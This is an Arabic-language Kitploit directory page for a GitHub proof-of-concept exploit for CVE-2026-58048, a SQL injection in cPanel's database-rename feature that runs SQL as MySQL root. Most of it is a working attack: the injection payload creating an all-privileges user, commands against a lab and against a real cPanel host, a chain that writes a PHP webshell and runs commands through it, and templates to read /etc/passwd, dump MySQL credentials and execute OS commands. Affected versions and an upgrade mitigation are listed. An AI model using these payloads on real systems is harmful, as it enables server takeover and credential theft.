Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2026-58048 — مشروع بحث أمني | Kitploit
أدوات/GitHubGitHub/imbas007/poc-cve-2026-58048
تصعيد الامتيازاتالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البياناتمختبرات وتدريب عملي
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

مشروع بحث أمني

عرض المستودع
16منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-58048

CVSS 4.0: 9.4 (حرجة) | CWE-89: SQL Injection | NVD

مستخدم cPanel مُصادَق عليه → SQL عشوائي بصلاحيات جذر MySQL عبر إعادة تسمية قاعدة البيانات. يحتفظ cPanel بشكل غير صحيح بإعداد sql_mode لجلسة المستخدم (ANSI_QUOTES) عند تنفيذ عمليات إعادة التسمية كجذر — حيث تكسر علامة backtick في اسم قاعدة البيانات حدود المعرّف وتحقن SQL.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

بدء سريع (مختبر Docker)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

وضع المختبر يُكتشف تلقائيًا — لا حاجة لخيار --lab.

هدف cPanel حقيقي

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

قوالب الحمولات الجاهزة

SQL مخصص: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

سلسلة RCE الكاملة (مختبر)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

الإصدارات المتأثرة

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

التخفيف: قم بالترقية، أو قم بإلغاء ميزة MySQL من مستخدمي cPanel.

المراجع

  • نشرة cPanel الأمنية
  • SecurityOnline

لأغراض اختبار الأمان المصرح به والتعليم فقط.

تنزيل الأداة
القالبالتأثير
admin-user (افتراضي)إنشاء مستخدم MySQL إداري rce
compact-adminحمولة إدارية قصيرة (<64 حرفًا — تناسب حد أسماء cPanel الفعلي؛ التحقق: r/p)
webshellكتابة قشرة PHP عبر INTO OUTFILE (--shell /var/www/html/shell.php)
read-fileقراءة ملف من الخادم عبر LOAD_FILE (--file /etc/passwd)
dump-usersتفريغ جميع بيانات اعتماد MySQL إلى pwn.users
udf-rceتنفيذ أوامر نظام التشغيل عبر UDF